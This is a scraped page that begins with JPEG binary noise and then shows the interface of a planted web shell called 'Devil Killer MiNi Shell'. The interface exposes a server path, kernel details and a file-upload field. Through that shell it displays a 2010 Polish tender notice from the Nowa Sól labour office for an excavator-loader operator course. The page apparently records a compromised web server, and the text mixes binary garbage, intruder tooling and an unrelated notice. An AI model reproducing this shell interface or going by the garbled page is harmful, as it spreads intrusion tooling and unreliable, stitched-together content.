JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100917/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100917/295748-N-2010.html

<p class="kh_header"><b>Nowa Sól: Usługa szkolenia w zakresie przeprowadzenia kursu dla 15 osób bezrobotnych pn.:
/Operator koparko - ładowarki, wszystkie typy klasy III/</b><br>
<b>Numer ogłoszenia: 295748 - 2010; data zamieszczenia: 17.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Nowej Soli , ul. Staszica 1C, 67-100 Nowa Sól, woj. lubuskie, tel. 0-68 3873242, faks 0-68 3873242.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup-nowasol.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa szkolenia w zakresie przeprowadzenia kursu dla 15 osób bezrobotnych pn.:
/Operator koparko - ładowarki, wszystkie typy klasy III/.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Kategoria według Słownika Zamówień (CPV): 80530000-8 usługi szkolenia zawodowego.
2.	Przedmiotem zamówienia jest usługa szkolenia w zakresie przeprowadzenia kursu dla 15 osób bezrobotnych pn.: /Operator koparko - ładowarki wszystkie typy klasy III/.  Szkolenie jest usługą organizowana ze względu na potrzeby rynku pracy w ramach projektu /Pomnóż swój kapitał/ w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VI. Rynek pracy otwarty dla wszystkich, Działanie 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, Poddziałanie 6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności zawodowej osób bezrobotnych, współfinansowanego w ramach Europejskiego Funduszu Społecznego.
3.	Szkoleniem zostaną objęte osoby zarejestrowane w Powiatowym Urzędzie Pracy w Nowej Soli jako osoby bezrobotne, posiadające zdolność do wykonywania zawodu operatora koparko ładowarki, potwierdzoną zaświadczeniem lekarskim, z różnym poziomem doświadczenia zawodowego, w tym również osoby nieposiadające udokumentowanego stażu pracy w obsłudze techniczno - eksploracyjnej maszyn budowlanych (co należy uwzględnić przy opracowaniu programu w zakresie dodatkowych zajęć dla bezrobotnych). 
4.	Szkolenie ma na celu przygotowanie kursantów do zdania sprawdzianu przed komisją powołaną przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie oraz uzyskania uprawnień do wykonywania zawodu operatora koparko-ładowarki wszystkie typy klasy III.
5.	Kurs musi się odbyć zgodnie z minimalnymi wymaganiami i warunkami określonymi w Rozporządzeniu Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. Nr 118, poz. 1263).
6.	Miejsce przeprowadzenia szkolenia - miasto Nowa Sól, dopuszcza się możliwość innego   miejsca szkolenia niż miasto Nowa Sól, jednak w takim przypadku koszty dowozu lub dojazdu uczestników szkolenia z miejscowości Nowa Sól do miejsca odbywania szkolenia jak również koszty zakwaterowania i wyżywienia - jeśli takie wystąpią - ponosi w całości jednostka szkoląca (co należy uwzględnić w kosztorysie szkolenia).
7.	Wykonawca ubezpieczy uczestników kursu na czas jego trwania od następstw nieszczęśliwych wypadków. Ubezpieczenie ma obejmować wypadki powstałe w związku ze szkoleniem oraz w drodze do miejsca szkolenia i z powrotem. Wysokość składki ma odpowiadać sumie ubezpieczenia NNW nie mniejszej niż 10 000,00 zł na jednego uczestnika szkolenia.
8.	Szkolenie musi być realizowane przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu dla wszystkich uczestników szkolenia, zgodnie z art. 40 ust. 4 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (tekst jednolity z 2008 roku Dz. U. Nr 69, poz. 415 z późniejszymi zmianami). Dzienna ilość godzin nie może przekroczyć 8 godzin zegarowych. Kurs nie może odbywać się w niedzielę i święta.
Czas realizacji jest to faktyczny czas przebywania uczestnika szkolenia na zajęciach w godzinach zegarowych tj. od godziny rozpoczęcia do godziny ich zakończenia łącznie z czasem przeznaczonym na przerwy. Długość i ilość przerw może być ustalana według uznania jednostki szkolącej, jednakże łączny czas przerw w danym dniu nie może przekroczyć iloczynu ilości godzin lekcyjnych i 15 minut czasu przeznaczonego na przerwę.
9.	Każdy uczestnik kursu ma otrzymać na własność w pierwszych dniach szkolenia literaturę wspomagającą w formie książki, dotyczącej tematyki szkolenia (zgodnie z prawem autorskim) oraz materiały do robienia notatek (np. notatnik, długopis). 
10.	Wykonawca zapewni wszystkim uczestnikom szkolenia napoje zimne i ciepłe oraz poczęstunek. Każdy uczestnik ma otrzymać w każdym dniu szkolenia jeden napój w jednorazowym opakowaniu o pojemności min. 200 ml oraz min. jedną świeża kanapkę. Poza tym każdy kursant musi mieć stały dostęp do napojów ciepłych (np. kawa, herbata), napojów zimnych (np. woda mineralna gazowana, niegazowana) oraz dodatkowy poczęstunek (np. paluszki, ciastka). Wartość cateringu dla całej grupy na okres trwania całego szkolenia ma wynosić minimum 1500,00 zł.
11.	Wykonawca będzie prowadził nadzór wewnętrzny nad szkoleniem służący podnoszeniu jakości prowadzonego szkolenia.
12.	Wykonawca będzie sprawdzał efekty szkolenia na poszczególnych etapach szkolenia wybranymi przez siebie metodami, w tym poprzez egzamin końcowy.
13.	Wykonawca przeprowadzi kurs zgodnie z opracowanym i przedstawionym w ofercie programem szkolenia, który należy sporządzić wg załącznika nr 1B do SIWZ i który ma zawierać: 
1)	nazwę i zakres szkolenia,
2)	ogólną liczbę godzin wraz z egzaminem końcowym przypadających na jednego uczestnika szkolenia - z podziałem na: godziny teoretyczne, godziny praktyczne i czas przewidywany na egzamin końcowy (wewnętrzny i sprawdzian zewnętrzny),
3)	czas trwania (od dnia rozpoczęcia do dnia zakończenia wraz z egzaminem końcowym - wewnętrznym i sprawdzianem zewnętrznym, podany w zaokrągleniu do pełnych tygodni - nie podając konkretnych dat realizacji szkolenia) oraz sposób organizacji szkolenia,
4)	wymagania wstępne dla uczestników szkolenia (z uwzględnieniem pkt 3),
5)	cele szkolenia (z uwzględnieniem pkt 4),
6)	plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem części teoretycznej i części praktycznej oraz czasu przewidzianego na egzaminy końcowe (wewnętrzny i sprawdzian zewnętrzny),
7)	treści szkolenia w zakresie poszczególnych zajęć edukacyjnych,
8)	wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych do realizacji przedstawionego programu,
9)	wykaz wszystkich materiałów szkoleniowych które otrzyma na własność każdy uczestnik kursu jak w pkt. 9 (przy literaturze należy podać wydawnictwo, tytuł, autor).
10)	sposób sprawdzania efektów szkolenia.
14. Szkolenie musi zakończyć się sprawdzianem przed Komisją Egzaminacyjną powołaną przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie. Sprawdzian ma być przeprowadzony w ostatnim dniu szkolenia. Czas sprawdzianu należy wliczyć do czasu trwania szkolenia i należy go ująć w ogólnej liczbie godzin szkolenia. Pozytywny wynik sprawdzianu jest podstawą do otrzymania świadectwa oraz książki operatora lub dokonania wpisu do już posiadanej książki operatora. Wzór książki operatora stanowi załącznik nr 3 do umowy.
15. Wykonawca do oferty musi dołączyć wzór świadectwa (dopuszcza się kserokopię) o którym mowa w §26.1 Rozporządzenia Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. Nr 118, poz. 1263), - które otrzyma osoba po pozytywnym wyniku sprawdzianu. Wzór świadectwa będzie stanowić załącznik nr 2 do umowy.
16. Uczestnicy szkolenia mają otrzymać również zaświadczenie potwierdzające ukończenie szkolenia wydane przez instytucję szkoleniową. W przypadku, gdy instytucja szkoleniowa stosuje Rozporządzenie Ministra Edukacji i Nauki z dnia 03 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216) instytucja ta po zakończeniu szkolenia wydaje uczestnikom zaświadczenie zgodne z § 6 ww. rozporządzenia. Pozostałe instytucje, po zakończeniu szkolenia, wydają uczestnikom zaświadczenie, które w swojej treści ma zawierać minimum niżej wymienione elementy:
a)	pieczęć organizatora szkolenia;
b)	personalne dane osoby, która szkolenie ukończyła (imię, nazwisko, data i miejsce urodzenia);
c)	nazwę formy kształcenia,
d)	nazwę organizatora szkolenia;
e)	termin realizacji szkolenia;
f)	cel szkolenia;
g)	miejscowość i data wydania zaświadczenia;
h)	podpis i pieczęć osoby upoważnionej przez organizatora szkolenia do wydania zaświadczenia;
i)	nazwę zajęć edukacyjnych oraz wymiar ich godzin.
Wykonawca zobowiązany jest przedstawić wraz z ofertą wzór zaświadczenia, jakie zostanie wydane uczestnikom - wzór zaświadczenia będzie stanowić załącznik nr 1 do umowy.
17. Szkolenie jest organizowane w ramach projektu współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. Informacja o wsparciu z EFS musi być widoczna dla wszystkich innych osób, które stykają się z projektami. Dlatego jednostka szkoląca ma zadbać aby uczestnicy kursu wiedzieli, że szkolenie jest organizowane w ramach konkretnego projektu współfinansowanego ze środków EFS. Akcja informacyjna polega na oznakowaniu materiałów związanych ze szkoleniem i sal gdzie będą odbywać się zajęcia - logami UE, EFS, PO KL i tytułem projektu wraz z nazwą programu, priorytetu, działania oraz poddziałania - zgodnie z wytycznymi dotyczącymi promocji projektów współfinansowanych z EFS, które zamieszczone są na stronie internetowej: www.efs.gov.pl/ZPFE/Strony/Logo.aspx - szczegółowe informacje można również uzyskać w PUP w Nowej Soli u osób upoważnionych do porozumiewania się z wykonawcami, wymienionych w pkt 10 części X SIWZ.
18. Uczestnicy szkolenia powinni dodatkowo otrzymać zaświadczenie poświadczające uczestnictwo w szkoleniu w ramach projektu /Pomnóż swój kapitał/ - w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VI. Rynek pracy otwarty dla wszystkich, Działanie 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, Poddziałanie 6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności zawodowej osób bezrobotnych, współfinansowanego z Europejskiego Funduszu Społecznego - wzór zaświadczenia stanowi załącznik nr 2 do umowy.
19. Wykonawca ma obowiązek zapewnienia warunków pracy zgodnie z przepisami bezpieczeństwa i higieny pracy w trakcie trwania szkolenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełniania tego warunku Zamawiający dokona na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu - wg załącznika nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełniania tego warunku Zamawiający dokona na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu - wg załącznika nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania przez Wykonawcę spełniania tego warunku - Zamawiający żąda, aby Wykonawca wykazał, że:
1) dysponuje lub będzie dysponował odpowiednim lokalem do zajęć teoretycznych i praktycznych  z podaniem adresu tego lokalu oraz sprzętem i wyposażeniem technicznym niezbędnym do wykonania zamówienia, wraz z informacją o podstawie do dysponowania tymi zasobami. Wykonawca musi wykazać, że zapewnia samodzielne stanowiska do zajęć teoretycznych dla każdego uczestnika szkolenia, placem manewrowym do zajęć praktycznych oraz sprzętem, w tym maszynami do robót ziemnych (zgodnie z Rozporządzeniem Ministra Gospodarki z dnia 20 września 2001 roku w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych) i wyposażeniem technicznym niezbędnym do wykonania zamówienia przy uwzględnieniu przez zamawiającego sposobu realizacji zajęć praktycznych np. przy podziale grupy na dwie oddzielne podgrupy, wraz z informacją o podstawie do dysponowania tymi zasobami. Oceny spełniania tego warunku Zamawiający dokona na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu - wg załącznika nr 2 do SIWZ, oraz na podstawie wskazania lokalu i placu manewrowego oraz sprzętu i wyposażenia technicznego, sporządzonego wg załącznika 2A do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania przez Wykonawcę spełniania tego warunku - Zamawiający żąda, aby Wykonawca wykazał, że:dysponuje lub będzie dysponował kadrą dydaktyczną o odpowiednich kwalifikacjach zawodowych, doświadczeniu zawodowym w zakresie tematyki kursu, niezbędnych do wykonania zamówienia wraz ze wskazaniem zakresu wykonywanych przez nich czynności, oraz informacją o podstawie do dysponowania tymi osobami.
Oceny spełniania tego warunku Zamawiający dokona na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu - wg załącznika nr 2 do SIWZ a także wykazu kadry dydaktycznej, którą dysponuje lub będzie dysponował wykonawca, sporządzonego wg załącznika nr 2B do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełniania tego warunku Zamawiający dokona na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu - wg załącznika nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca zgodnie z art. 20 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (tekst jednolity z 2008 roku Dz. U. Nr 69, poz. 415 z późniejszymi zmianami) musi posiadać aktualny na rok 2010 wpis do rejestru instytucji szkoleniowych:
3.1	w przypadku Wykonawców krajowych instytucja szkoleniowa musi posiadać aktualny na rok 2010 wpis do rejestru instytucji szkoleniowych prowadzony przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej,
3.2	w przypadku Wykonawców zagranicznych, jeśli instytucja ta posiada filię lub oddział w Polsce, rejestracja winna być dokonana w Wojewódzkim Urzędzie Pracy właściwym ze względu na siedzibę filii lub oddziału. W przypadku, gdy instytucja szkoleniowa nie posiada w Polsce filii ani oddziału winna zostać zarejestrowana w Wojewódzkim Urzędzie Pracy właściwym ze względu na miejsce świadczenia usługi szkoleniowej.
W celu potwierdzenia, warunku Zamawiającego opisanego wyżej - Wykonawca składa pisemne oświadczenie o posiadanym aktualnym na rok 2010 wpisie do rejestru instytucji szkoleniowych ze wskazaniem właściwego Wojewódzkiego Urzędu Pracy na załączniku nr 3 do SIWZ.
4	Wykonawca ubiegający się o zamówienie musi posiadać potwierdzenie, spełniania wymagań o których mowa w § 25 Rozporządzenia Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. Nr 118, poz. 1263, do prowadzenia kursów na operatorów maszyn i urządzeń budowlanych i drogowych w zakresie III klasy.
W celu potwierdzenia, spełniania wymagań o których mowa w Rozporządzeniu jak wyżej - Wykonawca przedstawi potwierdzenie spełniania wymagań wydane przez  Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie.
Oferta powinna zawierać:
1.	Wypełniony formularz ofertowy z podaniem ceny na całość zamówienia - wg załącznika nr 1 do SIWZ.
Do formularza ofertowego należy dołączyć:
1.1	Kosztorys szkolenia - wg załącznika nr 1A do SIWZ,
1.2	Opracowany szczegółowy program szkolenia - wg załącznik nr 1B do SIWZ.
1.3	Wzór zaświadczenia, potwierdzającego ukończenie szkolenia, które wyda wykonawca (zgodnie z zapisem pkt 16 części II SIWZ).
1.4	Wzór świadectwa, które otrzyma absolwent szkolenia po pozytywnym wyniku sprawdzianu (zgodnie z zapisem w pkt 15 części II SIWZ).
2.	Oświadczenie o spełnieniu przez Wykonawcę warunków udziału określonych w art. 22 ust. 1 ustawy- wg załącznika nr 2 do specyfikacji.
3.	Wskazanie adresu lokalu do zajęć teoretycznych i placu manewrowego do zajęć praktycznych oraz wykaz sprzętu i wyposażenia technicznego niezbędnego do wykonania zamówienia, którymi dysponuje lub będzie dysponował wykonawca - wg załącznika nr 2A do SIWZ.
4.	Wykaz kadry dydaktycznej, która będzie uczestniczyć w realizacji kursu o tematyce przedmiotu zamówienia jako wykładowca, osobno do każdej części zamówienia - wg załącznika nr 2B do SIWZ. 
5.	Oświadczenie o braku podstaw do wykluczenia z postępowania z powodu nie spełniania warunków określonych w  art. 24 ust 1 ustawy oraz oświadczenie o posiadanym aktualnym na rok 2010 wpisie do rejestru instytucji szkoleniowych prowadzonym przez właściwy Wojewódzki Urząd Pracy - wg załącznika 3 do specyfikacji.
6.	Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy wystawionego nie wcześniej niż 6 m-cy przed upływem terminu do składania ofert.
7.	Potwierdzenie spełnienia wymagań, do prowadzenia kursów na operatorów maszyn - wydane przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie.
8.	Oryginalne pełnomocnictwo lub odpis pełnomocnictwa poświadczony notarialnie dokument ma potwierdzać uprawnienie osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych.
9.	Dokumenty wymagane w przypadku składania oferty wspólnej.
8.1	Wskazanie pełnomocnika do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie zamówienia. Z dokumentu ma również wynikać jakie firmy będzie reprezentować pełnomocnik i która z firm jest liderem.
8.2	Oferta winna zawierać oświadczenia i dokumenty dla każdego partnera z osobna dotyczące własnej firmy o których mowa w części VII SIWZ pkt. 2, 5, 6 i 7.
10.	Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej.
9.1	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 6 składa dokumenty, zgodnie z opisem zawartym w pkt 5 części IV SIWZ.
UWAGA:
Do celów niniejszego przetargu dopuszcza się przedłożenie wymaganych dokumentów w formie odpisu lub kserokopii poświadczonej przez Wykonawcę /za zgodność z oryginałem/ (wyjątek stanowi pkt 8).
W przypadku przedłożenia kserokopii dokumentów, które składają się z dwóch lub więcej stron - należy poświadczyć /za zgodność z oryginałem/ każdą z tych stron.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
